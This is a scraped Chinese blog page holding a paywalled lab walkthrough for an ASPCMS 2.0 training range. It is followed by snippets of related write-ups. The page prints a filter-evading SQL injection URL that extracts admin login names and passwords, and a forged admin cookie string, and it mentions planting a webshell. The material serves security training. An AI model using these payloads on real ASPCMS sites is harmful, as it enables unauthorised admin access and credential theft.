墨者学院_CMS系统漏洞分析溯源(第4题)

最新推荐文章于 2024-03-08 16:45:53 发布
最新推荐文章于 2024-03-08 16:45:53 发布
阅读量757 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50698958/article/details/108992620
版权

靶场:

https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe

背景介绍

ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。

实训目标

1.学习登录绕过、cookie欺骗的相关知识;
2.熟悉火狐插件cookies Manager使用;
3.对代码的相关知识了解;

解题方向

代码审计漏洞,cookie伪造绕过身份鉴别

解题思路:

1、打开网址,查看页面源码,发现目标使用aspcms2.0

2、百度aspcms2.0,发现存在注入漏洞,利用payload

/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{p

最低0.47元/天 解锁文章
July_DET
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞复现(CVE-2024-29275)
0xSec
06-12 633
海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
墨者CMS系统漏洞分析溯源(第4)
zr1213159840的博客
01-28 1081
打开给的链接的页面,能发现是aspcms,还给了一个登录框 通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码 http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 对密码进行一
墨者学院 - CMS系统漏洞分析溯源(第4)
多崎巡礼的博客
10-09 1035
使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 793
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
墨者学院CMS系统漏洞分析溯源(第4)—两种解法
ploto_cs的博客
10-19 967
一.解思路 登录后台利用文件解析漏洞插入一句话木马 二.操作步骤 解法一 1.利用注入漏洞,获取后台密码 构造语句 http://ip:port/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 得到后台密码:121b28fa741f0976
墨者 - CMS系统漏洞分析溯源(第4)
吃肉唐僧的博客
07-19 1021
用御剑扫描后台 当访问admin/home.asp时候,提示还没登录 上网搜索aspcms的漏洞 参考;https://www.webshell.cc/2944.html 用 cookie manger伪造cookie cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageA...
360众测靶场库之32-CMS系统漏洞分析溯源(第4)
zjl12344的博客
03-08 217
360众测靶场
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
墨者安全专家第二代 彻底免疫未知病毒
11-02
同时第二代集终身趋势免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是第二代的“革离术”,在第一代基础上能让用户简单利用权限管理等功能,并且有效阻止...
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
aspcms开源的网站源码
04-09
aspcms,开源的网站源码 ★2.5.7 2015年1月20日 1.【重要】修复高危漏洞 2. 修复微信分享报错 3. 手机识别自动跳转 ★2.5.6 2015年1月10日 1.【重要】修复多处漏洞 2.修复搜索报错的问 3.手机访问自动跳转 4.修复留言页链接错误的问 5.完善支付宝接口 6.完善购物车
最新ASPCMS 0DAY利用工具(附VB源码)
03-25
详细使用方法在软件窗体内已经写好,直接编译执行即可使用.截止12-3-25日仍有效. 这是一个0day的EXP最好实例.
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
4. **危害**:命令执行漏洞可能导致数据泄露、系统破坏,甚至物理设备的操纵。 5. **修复**:限制命令行接口的使用,使用安全的API替代,或者对用户输入进行严格过滤和转义。 **相关性函数** 以下是一些常见的可能...
代码审计之DocCms漏洞分析
04-05 1798
0x01 前言 DocCms[音译:稻壳Cms] ,定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统,服务于企业品牌信息化建设,也适应用个人、门户网站建设! 0x02 环境搭建 DocCms官网:http://www.doccms.com 程序源码:DocCms2016 下载地址:https:...
复现 ASPCMS企业建站系统Cookies欺骗漏洞
记录并分享学习安全的知识点..
08-21 850
ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 ASPCMS2.0存在sql注入注入漏洞,可获得admin管理员用户的cookie值。
WEB攻防-asp安全
worryanswer的博客
08-11 771
web攻防-ASP安全
渗透漏洞分析--沙窝李的王
weixin_43600412的博客
06-19 1031
弱漏洞利用网站 网站暴库漏洞 暴库(常是Access数据库,文件格式:data.mdb;SQLserver、MySQL—>数据库连接文件),就是通过一些技术或者程序漏洞得到数据库的地址,并将数据库非法下载到本地, hacker非常乐意这种事件的发生,在得到网站数据库之后,就可以得到网站管理员的账号和密码,对网站进行破坏与管理,也能通过数据库的道德网站的隐私信息,甚至是最高权限。(目录遍历漏洞...
aspcms各版本漏洞0day集合
weixin_33889665的博客
11-03 2145
admin/_content/_About/AspCms_AboutEdit.asp?id=19and1=2unionselect1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24fromaspcms_userwhereuserid=1———————————...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值